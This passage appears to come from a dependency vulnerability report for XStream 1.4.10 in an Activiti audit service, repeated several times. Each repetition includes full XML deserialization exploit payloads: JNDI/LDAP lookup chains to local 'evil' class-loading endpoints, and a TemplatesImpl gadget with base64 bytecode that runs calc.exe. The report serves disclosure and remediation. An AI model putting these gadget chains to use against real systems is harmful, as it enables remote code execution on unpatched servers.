<javax.swing.UIDefaults_-ProxyLazyValue>
<className>javax.naming.InitialContext</className>
<methodName>doLookup</methodName>
<args>
<string>ldap://127.0.0.1:1389/#evil</string>
</args>
</javax.swing.UIDefaults_-ProxyLazyValue>
</hashtable>
<javax.swing.UIDefaults>
<default>
<defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>
<resourceCache/>
</default>
</javax.swing.UIDefaults>
</javax.swing.UIDefaults>
</tables>
</default>
</javax.swing.MultiUIDefaults>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>test</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>test</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>
XStream xstream = new XStream();
xstream.fromXML(xml);
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.
References
high severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.
PoC
<sorted-set>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>ysomap</type>
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
<soapPart/>
<mm>
<it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.toolkit.dir.ContextEnumerator'>
<children class='javax.naming.directory.BasicAttribute$ValuesEnumImpl'>
<list class='com.sun.xml.internal.dtdparser.SimpleHashtable'>
<current>
<hash>1</hash>
<key class='javax.naming.Binding'>
<name>ysomap</name>
<isRel>false</isRel>
<boundObj class='com.sun.jndi.ldap.LdapReferralContext'>
<refCtx class='javax.naming.spi.ContinuationDirContext'>
<cpe>
<stackTrace/>
<suppressedExceptions class='java.util.Collections$UnmodifiableRandomAccessList' resolves-to='java.util.Collections$UnmodifiableList'>
<c class='list'/>
<list reference='../c'/>
</suppressedExceptions>
<resolvedObj class='javax.naming.Reference'>
<className>EvilObj</className>
<addrs/>
<classFactory>EvilObj</classFactory>
<classFactoryLocation>http://127.0.0.1:1099/</classFactoryLocation>
</resolvedObj>
<altName class='javax.naming.CompoundName' serialization='custom'>
<javax.naming.CompoundName>
<properties/>
<int>1</int>
<string>ysomap</string>
</javax.naming.CompoundName>
</altName>
</cpe>
</refCtx>
<skipThisReferral>false</skipThisReferral>
<hopCount>0</hopCount>
</boundObj>
</key>
</current>
<currentBucket>0</currentBucket>
<count>0</count>
<threshold>0</threshold>
</list>
</children>
<currentReturned>true</currentReturned>
<currentChildExpanded>false</currentChildExpanded>
<rootProcessed>true</rootProcessed>
<scope>2</scope>
</aliases>
</it>
</mm>
</multiPart>
</sm>
</message>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>ysomap</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>test</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>
XStream xstream = new XStream();
xstream.fromXML(xml);
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.
References
high severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.
PoC
<sorted-set>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>ysomap</type>
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
<soapPart/>
<mm>
<it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.ldap.LdapSearchEnumeration'>
<listArg class='javax.naming.CompoundName' serialization='custom'>
<javax.naming.CompoundName>
<properties/>
<int>1</int>
<string>ysomap</string>
</javax.naming.CompoundName>
</listArg>
<cleaned>false</cleaned>
<res>
<msgId>0</msgId>
<status>0</status>
</res>
<enumClnt>
<isLdapv3>false</isLdapv3>
<referenceCount>0</referenceCount>
<pooled>false</pooled>
<authenticateCalled>false</authenticateCalled>
</enumClnt>
<limit>1</limit>
<posn>0</posn>
<homeCtx>
<__contextType>0</__contextType>
<port__number>1099</port__number>
<hostname>127.0.0.1</hostname>
<clnt reference='../../enumClnt'/>
<handleReferrals>0</handleReferrals>
<hasLdapsScheme>true</hasLdapsScheme>
<netscapeSchemaBug>false</netscapeSchemaBug>
<referralHopLimit>0</referralHopLimit>
<batchSize>0</batchSize>
<deleteRDN>false</deleteRDN>
<typesOnly>false</typesOnly>
<derefAliases>0</derefAliases>
<addrEncodingSeparator/>
<connectTimeout>0</connectTimeout>
<readTimeout>0</readTimeout>
<waitForReply>false</waitForReply>
<replyQueueSize>0</replyQueueSize>
<useSsl>false</useSsl>
<useDefaultPortNumber>false</useDefaultPortNumber>
<parentIsLdapCtx>false</parentIsLdapCtx>
<hopCount>0</hopCount>
<unsolicited>false</unsolicited>
<sharable>false</sharable>
<enumCount>1</enumCount>
<closeRequested>false</closeRequested>
</homeCtx>
<more>true</more>
<hasMoreCalled>true</hasMoreCalled>
<startName class='javax.naming.ldap.LdapName' serialization='custom'>
<javax.naming.ldap.LdapName>
<default/>
<string>uid=ysomap,ou=oa,dc=example,dc=com</string>
</javax.naming.ldap.LdapName>
</startName>
<searchArgs>
<name class='javax.naming.CompoundName' reference='../../listArg'/>
<filter>ysomap</filter>
<cons>
<searchScope>1</searchScope>
<timeLimit>0</timeLimit>
<derefLink>false</derefLink>
<returnObj>true</returnObj>
<countLimit>0</countLimit>
</cons>
<reqAttrs/>
</searchArgs>
<entries>
<com.sun.jndi.ldap.LdapEntry>
<DN>uid=songtao.xu,ou=oa,dc=example,dc=com</DN>
<attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>
<default>
<ignoreCase>false</ignoreCase>
</default>
<int>4</int>
<com.sun.jndi.ldap.LdapAttribute serialization='custom'>
<javax.naming.directory.BasicAttribute>
<default>
<ordered>false</ordered>
<attrID>objectClass</attrID>
</default>
<int>1</int>
<string>javaNamingReference</string>
</javax.naming.directory.BasicAttribute>
<com.sun.jndi.ldap.LdapAttribute>
<default>
<rdn class=''javax.naming.CompositeName'' serialization=''custom''>
<javax.naming.CompositeName>
<int>0</int>
</javax.naming.CompositeName>
</rdn>
</default>
</com.sun.jndi.ldap.LdapAttribute>
</com.sun.jndi.ldap.LdapAttribute>
<com.sun.jndi.ldap.LdapAttribute serialization='custom'>
<javax.naming.directory.BasicAttribute>
<default>
<ordered>false</ordered>
<attrID>javaCodeBase</attrID>
</default>
<int>1</int>
<string>http://127.0.0.1/</string>
</javax.naming.directory.BasicAttribute>
<com.sun.jndi.ldap.LdapAttribute>
<default>
<rdn class=''javax.naming.CompositeName'' serialization=''custom''>
<javax.naming.CompositeName>
<int>0</int>
</javax.naming.CompositeName>
</rdn>
</default>
</com.sun.jndi.ldap.LdapAttribute>
</com.sun.jndi.ldap.LdapAttribute>
<com.sun.jndi.ldap.LdapAttribute serialization='custom'>
<javax.naming.directory.BasicAttribute>
<default>
<ordered>false</ordered>
<attrID>javaClassName</attrID>
</default>
<int>1</int>
<string>foo</string>
</javax.naming.directory.BasicAttribute>
<com.sun.jndi.ldap.LdapAttribute>
<default>
<rdn class=''javax.naming.CompositeName'' serialization=''custom''>
<javax.naming.CompositeName>
<int>0</int>
</javax.naming.CompositeName>
</rdn>
</default>
</com.sun.jndi.ldap.LdapAttribute>
</com.sun.jndi.ldap.LdapAttribute>
<com.sun.jndi.ldap.LdapAttribute serialization='custom'>
<javax.naming.directory.BasicAttribute>
<default>
<ordered>false</ordered>
<attrID>javaFactory</attrID>
</default>
<int>1</int>
<string>EvilObj</string>
</javax.naming.directory.BasicAttribute>
<com.sun.jndi.ldap.LdapAttribute>
<default>
<rdn class=''javax.naming.CompositeName'' serialization=''custom''>
<javax.naming.CompositeName>
<int>0</int>
</javax.naming.CompositeName>
</rdn>
</default>
</com.sun.jndi.ldap.LdapAttribute>
</com.sun.jndi.ldap.LdapAttribute>
</attributes>
</com.sun.jndi.ldap.LdapEntry>
</entries>
</aliases>
</it>
</mm>
</multiPart>
</sm>
</message>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>ysomap</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>test</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>
XStream xstream = new XStream();
xstream.fromXML(xml);
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.
References
high severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.
PoC
<sorted-set>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>ysomap</type>
<value class='javax.swing.MultiUIDefaults' serialization='custom'>
<unserializable-parents/>
<hashtable>
<default>
<loadFactor>0.75</loadFactor>
<threshold>525</threshold>
</default>
<int>700</int>
<int>0</int>
</hashtable>
<javax.swing.UIDefaults>
<default>
<defaultLocale>zh_CN</defaultLocale>
<resourceCache/>
</default>
</javax.swing.UIDefaults>
<javax.swing.MultiUIDefaults>
<default>
<tables>
<javax.swing.UIDefaults serialization='custom'>
<unserializable-parents/>
<hashtable>
<default>
<loadFactor>0.75</loadFactor>
<threshold>525</threshold>
</default>
<int>700</int>
<int>1</int>
<string>ggg</string>
<javax.swing.UIDefaults_-ProxyLazyValue>
<className>javax.naming.InitialContext</className>
<methodName>doLookup</methodName>
<args>
<arg>ldap://localhost:1099/CallRemoteMethod</arg>
</args>
</javax.swing.UIDefaults_-ProxyLazyValue>
</hashtable>
<javax.swing.UIDefaults>
<default>
<defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>
<resourceCache/>
</default>
</javax.swing.UIDefaults>
</javax.swing.UIDefaults>
</tables>
</default>
</javax.swing.MultiUIDefaults>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>ysomap</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>test</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>
XStream xstream = new XStream();
xstream.fromXML(xml);
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.
References
high severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.activiti.cloud:activiti-cloud-services-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
Overview
com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.
Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.
PoC
<linked-hash-set>
<dynamic-proxy>
<interface>map</interface>
<handler class='com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl'>
<classToInvocationHandler class='linked-hash-map'/>
<defaultHandler class='sun.tracing.NullProvider'>
<active>true</active>
<providerType>java.lang.Object</providerType>
<probes>
<entry>
<method>
<class>java.lang.Object</class>
<name>hashCode</name>
<parameter-types/>
</method>
<sun.tracing.dtrace.DTraceProbe>
<proxy class='com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' serialization='custom'/>
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
<default>
<__name>Pwnr</__name>
<__bytecodes>
<byte-array>yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEACGNhbGMuZXhlCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAbeXNvc2VyaWFsL1B3bmVyNjMzNTA1NjA2NTkzAQAdTHlzb3NlcmlhbC9Qd25lcjYzMzUwNTYwNjU5MzsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAvAA4AAAAMAAEAAAAFAA8AOAAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAA0AA4AAAAgAAMAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAaAAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA4AA4AAAAqAAQAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAkAAMAAgAAAA+nAAMBTLgALxIxtgA1V7EAAAABADYAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAk=</byte-array>
<byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array>
</__bytecodes>
<__transletIndex>-1</__transletIndex>
<__indentNumber>0</__indentNumber>
</default>
</com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
</proxy>
<implementing__method>
<class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class>
<name>getOutputProperties</name>
<parameter-types/>
</implementing__method>
</sun.tracing.dtrace.DTraceProbe>
</entry>
</probes>
</defaultHandler>
</handler>
</dynamic-proxy>
</linked-hash-set>
XStream xstream = new XStream();
xstream.fromXML(xml);
Remediation
Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.
References
high severity
- Vulnerable module: com.thoughtworks.xstream:xstream
- Introduced through: org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA
Detailed paths
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
Introduced through: Activiti/activiti-cloud-audit-mongodb@Activiti/activiti-cloud-audit-mongodb#dcb84f09a6d7e0c0bd520b3a97fe235329c7c525 › org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA › org.springframework.cloud:spring-cloud-starter-netflix-eureka-client@5.0.0 › org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.0 › com.netflix.eureka:eureka-client@2.0.5 › com.thoughtworks.xstream:xstream@1.4.10Remediation: Upgrade to org.activiti.cloud:activiti-cloud-starter-audit-mongo@7-201802-EA.
-
